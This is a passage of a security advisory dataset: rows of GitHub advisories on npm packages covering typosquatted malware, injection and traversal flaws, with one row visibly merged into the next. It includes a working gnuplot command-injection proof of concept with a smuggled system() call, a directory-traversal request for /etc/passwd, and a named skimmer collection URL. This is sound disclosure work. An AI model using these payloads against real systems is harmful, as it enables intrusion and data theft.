'https://lists.apache.org/thread.html/rfc2bfd99c340dafd501676693cd889c1f9f838b97bdd0776a8f5557d@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2020.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-updates/2015-10/msg00033.html'}, {'type': 'WEB', 'url': 'http://mail-archives.apache.org/mod_mbox/tomcat-taglibs-user/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/130575/Apache-Standard-Taglibs-1.2.1-XXE-Remote-Command-Execution.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2015-1695.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2016-1838.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2016-1839.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2016-1840.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2016-1841.html'}, {'type': 'WEB', 'url': 'http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/archive/1/534772/100/0/threaded'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/72809'}, {'type': 'WEB', 'url': 'http://www.securitytracker.com/id/1034934'}, {'type': 'WEB', 'url': 'http://www.ubuntu.com/usn/USN-2551-1'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-14T18:42:48Z', 'nvd_published_at': '2015-03-09T14:59:00Z'}"
+1.4.0,GHSA-vw7g-jq9m-3q9v,2020-08-31T18:36:38Z,2020-09-02T18:23:35Z,,[],Unauthorized File Access in glance,"Versions of `glance` prior to 3.0.7 are vulnerable to Unauthorized File Access. The package provides a `--nodot` option meant to hide files and directories with names that begin with a `.`, such as `.git` but fails to hide files inside a folder that begins with `.`.
+
+
+## Recommendation
+
+Upgrade to version 3.0.7 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'glance'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.7'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/490379'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/811'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:36:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m5pf-5894-jmx7,2023-07-25T20:37:38Z,2020-09-03T19:08:00Z,,[],Malicious Package in sailclothjs,"Version 1.2.6 of `sailclothjs` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider a downgrade to 1.2.5",[],"[{'package': {'ecosystem': 'npm', 'name': 'sailclothjs'}, 'versions': ['1.2.6']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1099'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m4fq-xh7w-jhfm,2021-10-01T21:00:29Z,2020-09-03T19:39:46Z,,[],Malicious Package in crytpo-js,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'crytpo-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1391'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vxfp-qmpq-6826,2021-09-30T19:46:35Z,2020-09-03T17:38:09Z,,[],Malicious Package in hpmm,"All versions of `hpmm` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'hpmm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1053'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p4mf-4qvh-w8g5,2021-10-01T20:39:41Z,2020-09-04T15:41:42Z,,[],Malicious Package in bitcionjslib,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcionjslib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1361'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4ccc-jm2p-vg3p,2021-01-14T15:56:39Z,2020-09-01T16:14:22Z,,['CVE-2016-10696'],Downloads Resources over HTTP in windows-latestchromedriver,"Affected versions of `windows-latestchromedriver` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-latestchromedriver`.
+
+
+## Recommendation
+
+No patch is currently available for this vulnerability.
+
+The best mitigation is currently to avoid using this package, using a different package if available.
+
+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.",[],"[{'package': {'ecosystem': 'npm', 'name': 'windows-latestchromedriver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10696'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/295'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:18:14Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x48m-gp6r-gp4v,2021-09-30T20:04:54Z,2020-09-03T18:21:26Z,,[],Malicious Package in rate-map,"Version 1.0.3 of `rate-map` contains malicious code. The malware breaks functionality of the `purescript-installer` package by rewriting code of the `dl-tar` dependency.
+
+
+## Recommendation
+
+Upgrade to version 1.0.5 or later. There is no indication of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rate-map'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '1.0.5'}]}], 'versions': ['1.0.3']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1083'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-559q-92vx-xvjp,2021-09-30T20:00:23Z,2020-09-03T17:44:36Z,,[],Malicious Package in qingting,"All versions of `qingting` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'qingting'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1060'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vp93-gcx5-4w52,2021-09-28T17:00:47Z,2020-09-11T21:21:19Z,,[],Cross-Site Scripting in swagger-ui,"Versions of `swagger-ui` prior to 2.2.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize JSON schemas, allowing attackers to execute arbitrary JavaScript using `` is placed in the content of a wiki page, Jingo does not properly encode the input and it is executed instead of rendered as text.
+
+
+## Recommendation
+
+Upgrade to version 1.9.2",[],"[{'package': {'ecosystem': 'npm', 'name': 'jingo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/750'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4m3j-h8f2-4xh4,2021-10-01T20:58:35Z,2020-09-03T19:41:31Z,,[],Malicious Package in coinstrig,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'coinstrig'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1384'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j899-348x-h3rq,2021-09-30T20:27:53Z,2020-09-03T19:57:54Z,,[],Malicious Package in serializes,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'serializes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1139'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6mrq-7r7m-hh4p,2021-09-30T16:21:58Z,2020-09-03T22:52:58Z,,[],Malicious Package in hs-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'hs-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1275'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cr67-78jr-j94p,2020-08-31T18:46:25Z,2020-09-03T18:14:47Z,,[],Local File Inclusion in domokeeper,"All versions of `domokeeper` are vulnerable to Local File Inclusion. The `/plugin/` route passes a GET parameter unsanitized to a `require()` call. It then returns the output of `require()` in the server response. This may allow attackers to load unintended code in the application. It also allows attackers to exfiltrate information in `.json` files.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'domokeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1075'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f8vf-6hwg-hw55,2021-10-01T20:38:33Z,2020-09-04T15:38:21Z,,[],Malicious Package in bictore-lib,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bictore-lib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1357'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jqvv-r4w3-8f7w,2021-10-01T20:38:02Z,2020-09-04T15:35:00Z,,[],Malicious Package in bictoind-rpc,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bictoind-rpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1355'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-94m7-w873-6wwf,2023-07-27T20:34:14Z,2020-09-01T20:28:56Z,,[],Malicious Package in modlibrary,"Version 0.1.1 of `modlibrary` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.1.1 of this module is found installed you will want to replace it with a version before or after 0.1.1. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.1.0",[],"[{'package': {'ecosystem': 'npm', 'name': 'modlibrary'}, 'versions': ['0.1.1']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/631'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8gv6-g7vp-hr34,2023-09-12T18:51:19Z,2020-09-01T18:58:47Z,,['CVE-2017-16047'],mysqljs is malware,"The `mysqljs` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
+
+All versions have been unpublished from the npm registry.
+
+
+## Recommendation
+
+As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
+
+If you have found this installed in your environment, you should:
+1. Delete the package
+2. Clear your npm cache
+3. Ensure it is not present in any other package.json files on your system
+4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
+
+Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'mysqljs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16047'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/494'}]","{'cwe_ids': ['CWE-506'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:25:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cfwc-xjfp-44jg,2020-08-31T18:59:23Z,2020-09-04T17:19:48Z,,[],Command Injection in gnuplot,"All versions of `gnuplot` are vulnerable to Command Injection. The package fails to sanitize plot titles, which may allow attackers to execute arbitrary code in the system if the title value is supplied by a user. The following proof-of-concept creates a `testing` file in the current directory:
+
+```
+var gnuplot = require('gnuplot');
+
+const title = '""\nset title system(""touch testing"")\n#';
+
+gnuplot()
+.set('term png')
+.set('output ""out.png""')
+.set(`title ""${title}""`)
+.set('xrange [-10:10]')
+.set('yrange [-2:2]')
+.set('zeroaxis')
+.plot('(x/4)**2, sin(x), 1/x')
+.end();
+```
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'gnuplot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1440'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8qx4-r7fx-xc4v,2021-10-01T14:08:31Z,2020-09-11T21:08:19Z,,[],Malicious Package in requst,"All versions of `requst` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'requst'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/865'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xrr6-6ww3-f3qm,2020-08-31T18:39:27Z,2020-09-02T21:25:58Z,,[],Sandbox Breakout / Arbitrary Code Execution in value-censorship,"All versions of `value-censorship` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to validate async function constructors allowing attackers to execute arbitrary code.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'value-censorship'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/888'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cch6-5x4h-6qc5,2023-09-07T21:59:30Z,2020-09-01T16:46:04Z,,['CVE-2017-16097'],Directory Traversal in tiny-http,"Affected versions of `tiny-http` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tiny-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16097'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/tiny-http'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/342'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:19:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8vj3-jgcf-77jv,2021-10-01T14:04:42Z,2020-09-02T20:26:49Z,,[],Malicious Package in requeest,"All versions of `requeest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'requeest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/858'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4363-x42f-xph6,2021-10-01T21:03:00Z,2020-09-03T17:05:14Z,,[],Malicious Package in hw-trnasport-u2f,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'hw-trnasport-u2f'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1400'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hfc6-79wv-5hpw,2021-09-24T16:47:49Z,2020-09-01T19:48:13Z,,[],Malicious Package in blingjs,"Version 0.0.4 of `blingjs` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.0.4 of this module is found installed you will want to replace it with a version before or after 0.0.4. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'blingjs'}, 'versions': ['0.0.4']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/jamiller619/blingjs'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BLINGJS-451007'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/619'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-whjr-jj69-7prm,2021-09-30T20:15:59Z,2020-09-03T19:44:35Z,,[],Malicious Package in import-mysql,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'import-mysql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1127'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pjxp-f379-6284,2023-07-27T20:15:13Z,2020-09-03T19:13:27Z,,[],Malicious Package in @fangrong/xoc,"Version 1.0.6 of `@fangrong/xoc` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.5",[],"[{'package': {'ecosystem': 'npm', 'name': '@fangrong/xoc'}, 'versions': ['1.0.6']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1104'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-884p-74jh-xrg2,2020-08-31T18:59:05Z,2020-09-04T16:57:20Z,,[],Command Injection in tree-kill,"Versions of `tree-kill` prior to 1.2.2 are vulnerable to Command Injection. The package fails to sanitize values passed to the `kill` function. If this value is user-controlled it may allow attackers to run arbitrary commands in the server. The issue only affects Windows systems.
+
+
+## Recommendation
+
+Upgrade to version 1.2.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'tree-kill'}, 'ecosystem_specific': {'affected_functions': ['tree-kill']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pkrumins/node-tree-kill/commit/deee138a8cbc918463d8af5ce8c2bec33c3fd164'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/701183'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1432'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j8r2-2x94-2q67,2021-09-28T16:59:50Z,2020-09-11T21:19:09Z,,[],Cross-Site Scripting in diagram-js-direct-editing,"Versions of `diagram-js-direct-editing` prior to 1.4.3 are vulnerable to Cross-Site Scripting. The package fails to sanitize input from the clipboard, allowing attackers to execute arbitrary JavaScript in the victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 1.4.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'diagram-js-direct-editing'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/bpmn-io/diagram-js-direct-editing'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/983'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p77h-hv6g-fmfp,2021-09-29T18:49:03Z,2020-09-03T20:43:16Z,,[],Sensitive Data Exposure in ibm_db,"Versions of `ibm_db` prior to 2.6.0 are vulnerable to Sensitive Data Exposure. The package printed database credentials in plaintext in logs while in debug mode.
+
+
+## Recommendation
+
